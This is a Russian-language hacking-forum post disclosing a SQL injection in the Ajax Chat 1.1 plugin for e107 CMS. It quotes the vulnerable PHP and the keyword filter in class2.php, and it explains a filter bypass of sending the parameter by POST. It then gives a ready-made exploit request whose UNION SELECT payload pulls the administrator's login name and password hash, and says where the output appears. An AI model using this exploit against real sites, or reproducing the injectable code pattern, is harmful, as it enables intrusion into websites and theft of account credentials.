Prev Предыдущее сообщение   Следующее сообщение Next
Старый 05.07.2010, 12:13   #1
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию Уязвимости e107 CMS и плагинов

Plugin name: Ajax Chat (download)
Version: 1.1

SQL injection

Vuln file: /e107_plugins/ajax_chat/w.php
PHP код:
/*...*/
    
require_once("../../class2.php");
/*...*/
    
$msg $_REQUEST["m"];
    
$msg htmlspecialchars(stripslashes($msg));

    
$n $_REQUEST["n"];
    
$n htmlspecialchars(stripslashes($n));
/*...*/
$sql->mySQLresult = @mysql_query("SELECT user_id FROM ".MPREFIX."user WHERE user_name='".$n."' ");

        
$capt $sql->db_Fetch();
        
        
$theid =$capt['user_id'];
/*...*/        
$n "<strong>&lt;<a style=\"text-decoration: none;\" href='../../user.php?id.".$theid."'>".$n."</a>&gt;</strong>";
/*...*/

# file: /class2.php

/*...*/
$inArray = array("'"";""/**/""/UNION/""/SELECT/""AS ");
if (
strpos($_SERVER['PHP_SELF'], "trackback") === false) {
    foreach(
$inArray as $res) {
        if(
stristr($_SERVER['QUERY_STRING'], $res)) {
            die(
"Access denied.");
        }
    }
}
/*...*/ 
Передаем параметр "n" постом, чтобы "хакерские слова" не попали в QUERY_STRING

Exploit:
Код:
POST http://[host]/[path]/e107_plugins/ajax_chat/w.php?m=xek HTTP/1.0
Content-type: application/x-www-form-urlencoded

n=' union select concat_ws(0x3a,user_loginname,user_password) from e107_user where user_id=1-- 
Note: Вывод наблюдаем по адресу http://[host]/[path]/e107_plugins/ajax_chat/chat.txt
Код:
<strong>&lt;<a style="text-decoration: none;" href='../../user.php?id.{user_loginname:user_password}'>
RulleR вне форума   Ответить с цитированием
 

Метки
e107 cms, e107 cms vulnerabilities, уязвимости e107 cms

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot